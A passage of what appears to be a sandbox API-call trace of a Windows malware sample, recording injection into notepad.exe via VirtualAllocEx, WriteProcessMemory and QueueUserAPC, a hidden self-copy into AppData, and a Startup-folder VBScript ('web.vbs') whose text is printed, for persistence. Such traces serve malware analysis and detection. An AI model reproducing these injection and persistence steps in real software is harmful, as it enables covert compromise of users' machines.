ProcessInformation=0x18f87c, ReturnLength=0x0) returned 0x0 [0096.895] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f878, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f878, ReturnLength=0x0) returned 0xc0000353 [0096.895] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" [0096.895] CallWindowProcW (lpPrevWndFunc=0x2f0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x5dbde8 [0096.897] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", pNumArgs=0x18f87c | out: pNumArgs=0x18f87c) returned 0x5dbde8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" [0096.898] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0096.898] FindResourceW (hModule=0x400000, lpName=0x14d, lpType=0x17) returned 0x47cac8 [0096.898] SizeofResource (hModule=0x400000, hResInfo=0x47cac8) returned 0x2ab [0096.898] LoadResource (hModule=0x400000, hResInfo=0x47cac8) returned 0x4ec298 [0096.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2ab, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0096.899] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" [0096.899] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18edd8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0096.906] CallWindowProcW (lpPrevWndFunc=0x2f0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0096.906] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned 0x0 [0096.906] GetSystemDirectoryW (in: lpBuffer=0x18edd8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.906] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\notepad.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18efe0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f02c | out: lpCommandLine=0x0, lpProcessInformation=0x18f02c*(hProcess=0xec, hThread=0xf4, dwProcessId=0xe7c, dwThreadId=0xe80)) returned 1 [0097.013] VirtualAllocEx (hProcess=0xec, lpAddress=0x0, dwSize=0x804, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000 [0097.353] VirtualAllocEx (hProcess=0xec, lpAddress=0x0, dwSize=0x734, flAllocationType=0x3000, flProtect=0x4) returned 0x20000 [0097.377] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0xb0000, lpBuffer=0x18f060*, nSize=0x804, lpNumberOfBytesWritten=0x18f87c | out: lpBuffer=0x18f060*, lpNumberOfBytesWritten=0x18f87c*=0x804) returned 1 [0097.378] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x20000, lpBuffer=0x18e6a0*, nSize=0x734, lpNumberOfBytesWritten=0x18f87c | out: lpBuffer=0x18e6a0*, lpNumberOfBytesWritten=0x18f87c*=0x734) returned 1 [0097.533] QueueUserAPC (pfnAPC=0xb05c0, hThread=0xf4, dwData=0x20000) returned 0x1 [0097.533] ExitProcess (uExitCode=0x0) Process: id = "5" image_name = "notepad.exe" filename = "c:\\windows\\syswow64\\notepad.exe" page_root = "0x20ef1000" os_pid = "0xe7c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xe6c" cmd_line = "\"C:\\Windows\\system32\\notepad.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0xe80 [0098.177] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0098.178] LoadLibraryA (lpLibFileName="shell32") returned 0x76260000 [0098.178] LoadLibraryA (lpLibFileName="user32") returned 0x770d0000 [0098.178] OpenMutexW (dwDesiredAccess=0x0, bInheritHandle=0, lpName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned 0x0 [0098.178] Sleep (dwMilliseconds=0x64) [0098.277] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata"), lpSecurityAttributes=0x0) returned 1 [0098.278] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0 [0098.278] CopyFileW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe"), bFailIfExists=0) returned 1 [0098.311] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x2020 [0098.311] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe:ZoneIdentifier" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe:zoneidentifier"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc4 [0098.312] SetFilePointer (in: hFile=0xc4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.312] WriteFile (in: hFile=0xc4, lpBuffer=0x22f1f7*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x22efb0, lpOverlapped=0x0 | out: lpBuffer=0x22f1f7*, lpNumberOfBytesWritten=0x22efb0*=0x0, lpOverlapped=0x0) returned 1 [0098.312] CloseHandle (hObject=0xc4) returned 1 [0098.312] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x22f430*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f474 | out: lpCommandLine=0x0, lpProcessInformation=0x22f474*(hProcess=0xc0, hThread=0xc4, dwProcessId=0xeb0, dwThreadId=0xeb4)) returned 1 [0099.404] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x22f0f4 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0099.410] wsprintfA (in: param_1=0x22f2fc, param_2="SeT FPYAuAq = CreateobjecT(\"wscrIPT.SHeLl\")\r\nFPYAuaq.Run \"\"\"%ls\"\"\", 0, False" | out: param_1="SeT FPYAuAq = CreateobjecT(\"wscrIPT.SHeLl\")\r\nFPYAuaq.Run \"\"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"\"\", 0, False") returned 130 [0099.410] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\web.vbs")) returned 0 [0099.410] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\web.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd8 [0099.411] SetFilePointer (in: hFile=0xd8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.411] WriteFile (in: hFile=0xd8, lpBuffer=0x22f2fc*, nNumberOfBytesToWrite=0x83, lpNumberOfBytesWritten=0x22f0d4, lpOverlapped=0x0 | out: lpBuffer=0x22f2fc*, lpNumberOfBytesWritten=0x22f0d4*=0x83, lpOverlapped=0x0) returned 1 [0099.412] CloseHandle (hObject=0xd8) returned 1 [0099.413] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "sjfhjjskfsf.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe" page_root = "0xbf42000" os_pid = "0xeb0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe7c" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0xeb4 [0099.489] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0099.489] GetKeyboardType (nTypeFlag=0) returned 4 [0099.489] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" [0099.489] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0099.489] GetVersion () returned 0x1db10106 [0099.489] GetVersion () returned 0x1db10106 [0099.489] GetCurrentThreadId () returned 0xeb4 [0099.490] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.490] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.490] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0099.566] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0099.566] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0099.566] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0099.566] GetThreadLocale () returned 0x409 [0099.566] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0099.567] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 57 [0099.567] lstrcpynA (in: lpString1=0x18f909, lpString2="ENU", iMaxLength=207 | out: lpString1="ENU") returned="ENU" [0099.567] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0099.568] lstrcpynA (in: lpString1=0x18f909, lpString2="EN", iMaxLength=207 | out: lpString1="EN") returned="EN" [0099.568] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0099.568] LoadStringA (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0099.568] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x967270 [0099.568] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x210000 [0099.569] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x968270 [0099.569] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0099.569] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0099.570] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0099.570] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.570] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75b90000 [0099.570] GetProcAddress (hModule=0x75b90000, lpProcName="GetDiskFreeSpaceExA") returned 0x75c2434f [0099.570] GetThreadLocale () returned 0x409 [0099.570] GetThreadLocale () returned 0x409 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0099.570] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0099.571] GetThreadLocale () returned 0x409 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0099.571] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0099.572] GetThreadLocale () returned 0x409 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0099.572] GetThreadLocale () returned 0x409 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0099.572] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0099.572] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75e60000 [0099.572] GetProcAddress (hModule=0x75e60000, 